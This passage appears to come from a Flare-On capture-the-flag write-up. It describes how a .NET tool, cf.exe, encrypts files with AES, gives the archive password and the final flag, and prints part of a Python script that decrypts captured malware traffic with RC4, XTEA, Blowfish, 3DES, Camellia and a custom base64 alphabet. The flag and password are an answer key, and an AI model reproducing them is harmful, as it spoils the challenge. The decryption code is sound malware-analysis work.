<p><code class="highlighter-rouge">cf.exe</code> is written in <code class="highlighter-rouge">.NET</code> and can be read with <code class="highlighter-rouge">dnSpy</code>. <code class="highlighter-rouge">cf.exe</code> encrypts the data with AES, stores the data's sha256, path, file size and the IV used for encryption in a header, and prefixes the output with <code class="highlighter-rouge">cryp</code>.</p>
<p><img src="https://i.imgur.com/QE82WUZ.png" alt="" /></p>
<p>Write a decryptor and unlock the archive with the password obtained from the BMP image, <code class="highlighter-rouge">infectedinfectedinfectedinfectedinfected919</code></p>
<p><img src="https://i.imgur.com/QMwWW3X.png" alt="" /></p>
<h3 id="取得-flag">取得 flag</h3>
<p>The answer is: <code class="highlighter-rouge">n3v3r_gunna_l3t_you_down_1987_4_ever@flare-on.com</code></p>
<hr />
<h2 id="附錄一-解密封包的-packetdecodepy">Appendix 1: <code class="highlighter-rouge">PacketDecode.py</code> for decrypting the packets</h2>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">import</span> <span class="nn">xtea</span> <span class="c">#pip install xtea</span>
<span class="kn">import</span> <span class="nn">camellia</span> <span class="c">#pip install python-camellia</span>
<span class="kn">from</span> <span class="nn">termcolor</span> <span class="kn">import</span> <span class="n">colored</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">Blowfish</span>
<span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">DES3</span>
<span class="n">plugin_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">plugin_size</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">bmp_header</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">bmp_body</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">file_name</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">file_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">recv_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">send_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">DUMP_FILE</span> <span class="o">=</span> <span class="bp">True</span>
<span class="c">######################################## read packet functions ######################################## </span>
<span class="k">def</span> <span class="nf">read_stage2_packet</span><span class="p">():</span>
<span class="k">with</span> <span class="nb">open</span> <span class="p">(</span><span class="s">'packet.json'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">packet</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="k">return</span> <span class="n">packet</span>
<span class="k">def</span> <span class="nf">read_stage3_packet</span><span class="p">(</span><span class="n">binary</span><span class="p">):</span>
<span class="nb">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">binary</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">return</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="c">############################################ dump functions ########################################### </span>
<span class="k">def</span> <span class="nf">hexdump</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">length</span><span class="o">=</span><span class="mi">16</span><span class="p">):</span>
<span class="n">FILTER</span> <span class="o">=</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">([(</span><span class="nb">len</span><span class="p">(</span><span class="nb">repr</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">x</span><span class="p">)))</span> <span class="o">==</span> <span class="mi">3</span><span class="p">)</span> <span class="ow">and</span> <span class="nb">chr</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="ow">or</span> <span class="s">'.'</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">256</span><span class="p">)])</span>
<span class="n">lines</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">src</span><span class="p">),</span> <span class="n">length</span><span class="p">):</span>
<span class="n">chars</span> <span class="o">=</span> <span class="n">src</span><span class="p">[</span><span class="n">c</span><span class="p">:</span><span class="n">c</span><span class="o">+</span><span class="n">length</span><span class="p">]</span>
<span class="nb">hex</span> <span class="o">=</span> <span class="s">' '</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="s">"</span><span class="si">%02</span><span class="s">x"</span> <span class="o">%</span> <span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">])</span>
<span class="n">printable</span> <span class="o">=</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="s">"</span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="p">((</span><span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o"><=</span> <span class="mi">127</span> <span class="ow">and</span> <span class="n">FILTER</span><span class="p">[</span><span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)])</span> <span class="ow">or</span> <span class="s">'.'</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">])</span>
<span class="n">lines</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="s">"</span><span class="si">%04</span><span class="s">x </span><span class="si">%-*</span><span class="s">s </span><span class="si">%</span><span class="s">s</span><span class="se">\n</span><span class="s">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="n">length</span><span class="o">*</span><span class="mi">3</span><span class="p">,</span> <span class="nb">hex</span><span class="p">,</span> <span class="n">printable</span><span class="p">))</span>
<span class="k">return</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">lines</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">dump</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="k">if</span> <span class="n">DUMP_FILE</span><span class="p">:</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="s">"dump"</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">makedirs</span><span class="p">(</span><span class="s">"dump"</span><span class="p">)</span>
<span class="nb">open</span><span class="p">(</span><span class="s">"./dump/"</span> <span class="o">+</span> <span class="n">name</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">save_bmp</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">,</span> <span class="n">bmp_body</span><span class="p">):</span>
<span class="n">bmp</span> <span class="o">=</span> <span class="s">"BM"</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">)</span><span class="o">+</span><span class="nb">len</span><span class="p">(</span><span class="n">bmp_body</span><span class="p">)</span><span class="o">+</span><span class="mi">14</span><span class="p">)</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="c"># bmp += p32(1078)</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="mi">54</span><span class="p">)</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">bmp_header</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">bmp_body</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"Save BMP"</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="n">dump</span><span class="p">(</span><span class="s">"screen_</span><span class="si">%</span><span class="s">d.bmp"</span> <span class="o">%</span> <span class="nb">len</span><span class="p">(</span><span class="n">bmp</span><span class="p">),</span> <span class="n">bmp</span><span class="p">)</span>
<span class="c">########################################## decrypt functions ########################################## </span>
<span class="k">def</span> <span class="nf">RC4</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
<span class="n">S</span> <span class="o">=</span> <span class="nb">range</span><span class="p">(</span><span class="mi">256</span><span class="p">);</span><span class="n">j</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">256</span><span class="p">):</span>
<span class="n">j</span> <span class="o">=</span> <span class="p">(</span><span class="n">j</span> <span class="o">+</span> <span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="nb">ord</span><span class="p">(</span><span class="n">key</span><span class="p">[</span><span class="n">i</span><span class="o">%</span><span class="nb">len</span><span class="p">(</span><span class="n">key</span><span class="p">)]))</span> <span class="o">%</span> <span class="mi">256</span>
<span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">],</span> <span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
<span class="n">j</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">res</span> <span class="o">=</span> <span class="s">""</span>
<span class="k">for</span> <span class="n">d</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
<span class="n">i</span> <span class="o">=</span> <span class="p">(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="mi">256</span>
<span class="n">j</span> <span class="o">=</span> <span class="p">(</span><span class="n">j</span> <span class="o">+</span> <span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">%</span> <span class="mi">256</span>
<span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">],</span> <span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
<span class="n">res</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">d</span><span class="p">)</span> <span class="o">^</span> <span class="n">S</span><span class="p">[(</span><span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">])</span> <span class="o">%</span> <span class="mi">256</span><span class="p">])</span>
<span class="k">return</span> <span class="n">res</span>
<span class="k">def</span> <span class="nf">simple_substitution_cipher</span><span class="p">(</span><span class="n">body</span><span class="p">):</span>
<span class="n">m</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0xC7</span><span class="p">,</span><span class="mh">0x19</span><span class="p">,</span><span class="mh">0x30</span><span class="p">,</span><span class="mh">0x0C</span><span class="p">,</span><span class="mh">0xA8</span><span class="p">,</span><span class="mh">0x10</span><span class="p">,</span><span class="mh">0xAD</span><span class="p">,</span><span class="mh">0xD5</span><span class="p">,</span><span class="mh">0xD4</span><span class="p">,</span><span class="mh">0x16</span><span class="p">,</span><span class="mh">0x52</span><span class="p">,</span><span class="mh">0xFC</span><span class="p">,</span><span class="mh">0x1B</span><span class="p">,</span><span class="mh">0x82</span><span class="p">,</span><span class="mh">0x7D</span><span class="p">,</span><span class="mh">0x32</span><span class="p">,</span><span class="mh">0x34</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0xE6</span><span class="p">,</span><span class="mh">0x4C</span><span class="p">,</span><span class="mh">0x12</span><span class="p">,</span><span class="mh">0x08</span><span class="p">,</span><span class="mh">0x2B</span><span class="p">,</span><span class="mh">0xF7</span><span class="p">,</span><span class="mh">0xAC</span><span class="p">,</span><span class="mh">0x8B</span><span class="p">,</span><span class="mh">0x3F</span><span class="p">,</span><span class="mh">0x67</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x72</span><span class="p">,</span><span class="mh">0x21</span><span class="p">,</span><span class="mh">0xDC</span><span class="p">,</span><span class="mh">0xED</span><span class="p">,</span><span class="mh">0xF6</span><span class="p">,</span><span class="mh">0x85</span><span class="p">,</span><span class="mh">0xB8</span><span class="p">,</span><span class="mh">0x4F</span><span 
class="p">,</span><span class="mh">0x5F</span><span class="p">,</span><span class="mh">0x53</span><span class="p">,</span><span class="mh">0x0A</span><span class="p">,</span><span class="mh">0x04</span><span class="p">,</span><span class="mh">0x28</span><span class="p">,</span><span class="mh">0xDF</span><span class="p">,</span><span class="mh">0xD8</span><span class="p">,</span><span class="mh">0x7E</span><span class="p">,</span><span class="mh">0x06</span><span class="p">,</span><span class="mh">0x3D</span><span class="p">,</span><span class="mh">0x03</span><span class="p">,</span><span class="mh">0x40</span><span class="p">,</span><span class="mh">0x36</span><span class="p">,</span><span class="mh">0x68</span><span class="p">,</span><span class="mh">0x73</span><span class="p">,</span><span class="mh">0x25</span><span class="p">,</span><span class="mh">0xB7</span><span class="p">,</span><span class="mh">0x5D</span><span class="p">,</span><span class="mh">0x1E</span><span class="p">,</span><span class="mh">0xD2</span><span class="p">,</span><span class="mh">0x0D</span><span class="p">,</span><span class="mh">0xC6</span><span class="p">,</span><span class="mh">0xC3</span><span class="p">,</span><span class="mh">0x22</span><span class="p">,</span><span class="mh">0xF2</span><span class="p">,</span><span class="mh">0x20</span><span class="p">,</span><span class="mh">0x0E</span><span class="p">,</span><span class="mh">0x17</span><span class="p">,</span><span class="mh">0xCC</span><span class="p">,</span><span class="mh">0x60</span><span class="p">,</span><span class="mh">0x5C</span><span class="p">,</span><span class="mh">0x51</span><span class="p">,</span><span class="mh">0xC2</span><span class="p">,</span><span class="mh">0x1D</span><span class="p">,</span><span class="mh">0x4A</span><span class="p">,</span><span class="mh">0xCB</span><span class="p">,</span><span class="mh">0x33</span><span class="p">,</span><span class="mh">0x1C</span><span class="p">,</span><span 
class="mh">0xF8</span><span class="p">,</span><span class="mh">0x66</span><span class="p">,</span><span class="mh">0x83</span><span class="p">,</span><span class="mh">0x6B</span><span class="p">,</span><span class="mh">0x3E</span><span class="p">,</span><span class="mh">0x27</span><span class="p">,</span><span class="mh">0xE3</span><span class="p">,</span><span class="mh">0x9F</span><span class="p">,</span><span class="mh">0xF5</span><span class="p">,</span><span class="mh">0x3A</span><span class="p">,</span><span class="mh">0xAA</span><span class="p">,</span><span class="mh">0x8A</span><span class="p">,</span><span class="mh">0x26</span><span class="p">,</span><span class="mh">0x7F</span><span class="p">,</span><span class="mh">0x5A</span><span class="p">,</span><span class="mh">0x42</span><span class="p">,</span><span class="mh">0xCF</span><span class="p">,</span><span class="mh">0x7C</span><span class="p">,</span><span class="mh">0x07</span><span class="p">,</span><span class="mh">0x58</span><span class="p">,</span><span class="mh">0x71</span><span class="p">,</span><span class="mh">0xEB</span><span class="p">,</span><span class="mh">0x05</span><span class="p">,</span><span class="mh">0xBA</span><span class="p">,</span><span class="mh">0x29</span><span class="p">,</span><span class="mh">0x4B</span><span class="p">,</span><span class="mh">0x7A</span><span class="p">,</span><span class="mh">0xE0</span><span class="p">,</span><span class="mh">0xEC</span><span class="p">,</span><span class="mh">0x9A</span><span class="p">,</span><span class="mh">0x7B</span><span class="p">,</span><span class="mh">0x2E</span><span class="p">,</span><span class="mh">0x37</span><span class="p">,</span><span class="mh">0xFE</span><span class="p">,</span><span class="mh">0xA4</span><span class="p">,</span><span class="mh">0xBE</span><span class="p">,</span><span class="mh">0x49</span><span class="p">,</span><span class="mh">0xDE</span><span class="p">,</span><span 
class="mh">0x00</span><span class="p">,</span><span class="mh">0xC5</span><span class="p">,</span><span class="mh">0xBB</span><span class="p">,</span><span class="mh">0x96</span><span class="p">,</span><span class="mh">0xE9</span><span class="p">,</span><span class="mh">0xC4</span><span class="p">,</span><span class="mh">0x79</span><span class="p">,</span><span class="mh">0x99</span><span class="p">,</span><span class="mh">0x87</span><span class="p">,</span><span class="mh">0xF4</span><span class="p">,</span><span class="mh">0x13</span><span class="p">,</span><span class="mh">0x1A</span><span class="p">,</span><span class="mh">0x15</span><span class="p">,</span><span class="mh">0x63</span><span class="p">,</span><span class="mh">0xF9</span><span class="p">,</span><span class="mh">0xA0</span><span class="p">,</span><span class="mh">0xD1</span><span class="p">,</span><span class="mh">0x02</span><span class="p">,</span><span class="mh">0xD6</span><span class="p">,</span><span class="mh">0x09</span><span class="p">,</span><span class="mh">0x1F</span><span class="p">,</span><span class="mh">0xE5</span><span class="p">,</span><span class="mh">0x92</span><span class="p">,</span><span class="mh">0x6A</span><span class="p">,</span><span class="mh">0xE7</span><span class="p">,</span><span class="mh">0x18</span><span class="p">,</span><span class="mh">0x43</span><span class="p">,</span><span class="mh">0x91</span><span class="p">,</span><span class="mh">0x6E</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0xC8</span><span class="p">,</span><span class="mh">0xA3</span><span class="p">,</span><span class="mh">0xB2</span><span class="p">,</span><span class="mh">0x2C</span><span class="p">,</span><span class="mh">0xEE</span><span class="p">,</span><span class="mh">0x8D</span><span class="p">,</span><span class="mh">0xA6</span><span class="p">,</span><span class="mh">0x5B</span><span class="p">,</span><span 
class="mh">0xEF</span><span class="p">,</span><span class="mh">0x24</span><span class="p">,</span><span class="mh">0xB9</span><span class="p">,</span><span class="mh">0x75</span><span class="p">,</span><span class="mh">0x57</span><span class="p">,</span><span class="mh">0x0F</span><span class="p">,</span><span class="mh">0x6F</span><span class="p">,</span><span class="mh">0x11</span><span class="p">,</span><span class="mh">0x47</span><span class="p">,</span><span class="mh">0x9B</span><span class="p">,</span><span class="mh">0x3B</span><span class="p">,</span><span class="mh">0x76</span><span class="p">,</span><span class="mh">0xE1</span><span class="p">,</span><span class="mh">0x9D</span><span class="p">,</span><span class="mh">0x64</span><span class="p">,</span><span class="mh">0x54</span><span class="p">,</span><span class="mh">0xA7</span><span class="p">,</span><span class="mh">0xC1</span><span class="p">,</span><span class="mh">0x55</span><span class="p">,</span><span class="mh">0xB3</span><span class="p">,</span><span class="mh">0x89</span><span class="p">,</span><span class="mh">0x31</span><span class="p">,</span><span class="mh">0xFD</span><span class="p">,</span><span class="mh">0xAB</span><span class="p">,</span><span class="mh">0xB1</span><span class="p">,</span><span class="mh">0x94</span><span class="p">,</span><span class="mh">0xB6</span><span class="p">,</span><span class="mh">0x14</span><span class="p">,</span><span class="mh">0x2F</span><span class="p">,</span><span class="mh">0xF3</span><span class="p">,</span><span class="mh">0xBC</span><span class="p">,</span><span class="mh">0x69</span><span class="p">,</span><span class="mh">0xBF</span><span class="p">,</span><span class="mh">0xA1</span><span class="p">,</span><span class="mh">0x80</span><span class="p">,</span><span class="mh">0x59</span><span class="p">,</span><span class="mh">0x0B</span><span class="p">,</span><span class="mh">0xBD</span><span class="p">,</span><span 
class="mh">0xC9</span><span class="p">,</span><span class="mh">0x2A</span><span class="p">,</span><span class="mh">0xD7</span><span class="p">,</span><span class="mh">0x81</span><span class="p">,</span><span class="mh">0x3C</span><span class="p">,</span><span class="mh">0x23</span><span class="p">,</span><span class="mh">0xD3</span><span class="p">,</span><span class="mh">0xF1</span><span class="p">,</span><span class="mh">0xFA</span><span class="p">,</span><span class="mh">0xEA</span><span class="p">,</span><span class="mh">0x39</span><span class="p">,</span><span class="mh">0x38</span><span class="p">,</span><span class="mh">0x9E</span><span class="p">,</span><span class="mh">0x5E</span><span class="p">,</span><span class="mh">0xB5</span><span class="p">,</span><span class="mh">0x45</span><span class="p">,</span><span class="mh">0x61</span><span class="p">,</span><span class="mh">0xFF</span><span class="p">,</span><span class="mh">0x4E</span><span class="p">,</span><span class="mh">0x77</span><span class="p">,</span><span class="mh">0x4D</span><span class="p">,</span><span class="mh">0x65</span><span class="p">,</span><span class="mh">0x9C</span><span class="p">,</span><span class="mh">0xE8</span><span class="p">,</span><span class="mh">0xD9</span><span class="p">,</span><span class="mh">0x93</span><span class="p">,</span><span class="mh">0xAF</span><span class="p">,</span><span class="mh">0x50</span><span class="p">,</span><span class="mh">0xA2</span><span class="p">,</span><span class="mh">0x84</span><span class="p">,</span><span class="mh">0x88</span><span class="p">,</span><span class="mh">0x78</span><span class="p">,</span><span class="mh">0x98</span><span class="p">,</span><span class="mh">0xE2</span><span class="p">,</span><span class="mh">0x86</span><span class="p">,</span><span class="mh">0xCE</span><span class="p">,</span><span class="mh">0xDD</span><span class="p">,</span><span class="mh">0x8C</span><span class="p">,</span><span 
class="mh">0x8E</span><span class="p">,</span><span class="mh">0xA9</span><span class="p">,</span><span class="mh">0x95</span><span class="p">,</span><span class="mh">0x70</span><span class="p">,</span><span class="mh">0xAE</span><span class="p">,</span><span class="mh">0xE4</span><span class="p">,</span><span class="mh">0xCA</span><span class="p">,</span><span class="mh">0x62</span><span class="p">,</span><span class="mh">0xCD</span><span class="p">,</span><span class="mh">0x90</span><span class="p">,</span><span class="mh">0xC0</span><span class="p">,</span><span class="mh">0xFB</span><span class="p">,</span><span class="mh">0xB0</span><span class="p">,</span><span class="mh">0xDB</span><span class="p">,</span><span class="mh">0xB4</span><span class="p">,</span><span class="mh">0xD0</span><span class="p">,</span><span class="mh">0x97</span><span class="p">,</span><span class="mh">0xF0</span><span class="p">,</span><span class="mh">0x2D</span><span class="p">,</span><span class="mh">0x46</span><span class="p">,</span><span class="mh">0xDA</span><span class="p">,</span><span class="mh">0x6C</span><span class="p">,</span><span class="mh">0x6D</span><span class="p">,</span><span class="mh">0x44</span><span class="p">,</span><span class="mh">0x74</span><span class="p">,</span><span class="mh">0xA5</span><span class="p">,</span><span class="mh">0x8F</span><span class="p">,</span><span class="mh">0x56</span><span class="p">,</span><span class="mh">0x35</span><span class="p">]</span>
<span class="k">return</span> <span class="s">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="nb">ord</span><span class="p">(</span><span class="n">i</span><span class="p">)])</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">body</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">do_base64</span><span class="p">(</span><span class="n">body</span><span class="p">):</span>
<span class="n">standard_base64</span> <span class="o">=</span> <span class="s">'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'</span>
<span class="n">custom_base64</span> <span class="o">=</span> <span class="s">'B7wAOjbXLsD+S24/tcgHYqFRdVKTp0ixlGIMCf8zvE5eoN1uyU93Wm6rZPQaJhkn'</span>
<span class="n">table</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">maketrans</span><span class="p">(</span><span class="n">custom_base64</span><span class="p">,</span> <span class="n">standard_base64</span><span class="p">)</span>
<span class="k">return</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">body</span><span class="o">.</span><span class="n">translate</span><span class="p">(</span><span class="n">table</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">xtea_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">iv</span><span class="p">,</span> <span class="n">buf</span><span class="p">):</span>
<span class="n">x</span> <span class="o">=</span> <span class="n">xtea</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">mode</span> <span class="o">=</span> <span class="n">xtea</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">IV</span> <span class="o">=</span> <span class="n">iv</span><span class="p">)</span>
<span class="k">return</span> <span class="n">x</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">blowfish_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">ciphertext</span><span class="p">,</span> <span class="n">iv</span><span class="p">):</span>
<span class="n">bs</span> <span class="o">=</span> <span class="n">Blowfish</span><span class="o">.</span><span class="n">block_size</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="o">%</span> <span class="mi">8</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">ciphertext</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">8</span><span class="o">-</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="o">%</span> <span class="mi">8</span><span class="p">))</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="n">Blowfish</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">Blowfish</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
<span class="n">plaintext</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span>
<span class="k">return</span> <span class="n">plaintext</span>
<span class="k">def</span> <span class="nf">des_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">ciphertext</span><span class="p">,</span> <span class="n">iv</span><span class="p">):</span>
<span class="n">bs</span> <span class="o">=</span> <span class="mi">8</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="o">%</span> <span class="n">bs</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">ciphertext</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="n">bs</span> <span class="o">-</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="o">%</span> <span class="n">bs</span><span class="p">))</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="n">DES3</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">DES3</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
<span class="n">plaintext</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span>
<span class="k">return</span> <span class="n">plaintext</span>
<span class="k">def</span> <span class="nf">camellia_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">ciphertext</span><span class="p">):</span>
<span class="n">bs</span> <span class="o">=</span> <span class="mi">16</span>
<span class="n">plaintext</span> <span class="o">=</span> <span class="s">""</span>
<span class="c"># print("c_dll -> key=%s , len(enc)=%d" % (key.encode('hex'), len(ciphertext)))</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="n">camellia</span><span class="o">.</span><span class="n">CamelliaCipher</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">key</span><span class="p">,</span> <span class="n">mode</span><span class="o">=</span><span class="n">camellia</span><span class="o">.</span><span class="n">MODE_ECB</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">),</span> <span class="n">bs</span><span class="p">):</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">ciphertext</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="n">bs</span><span class="p">]</span>
<span class="n">plaintext</span><span class="o">+=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">block</span><span class="p">)</span>
<span class="c"># print("c_dll -> len(dec)=%d" % (len(plaintext)))</span>
<span class="k">return</span> <span class="n">plaintext</span>
<span class="c">########################################### decode functions ########################################## </span>
<span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="n">header</span> <span class="o">=</span> <span class="n">data</span><span class="p">[:</span><span class="mi">36</span><span class="p">]</span>
<span class="n">year</span> <span class="o">=</span> <span class="n">header</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span>
<span class="c">#print "year = " + year.encode('hex')</span>
<span class="n">checksum</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
<span class="c">#print "checksum = " + hex(checksum)</span>
<span class="n">header_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="c">#print "header size = " + hex(header_size)</span>
<span class="n">body_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">12</span><span class="p">:</span><span class="mi">16</span><span class="p">])</span>
<span class="c">#print "body size = " + hex(body_size)</span>
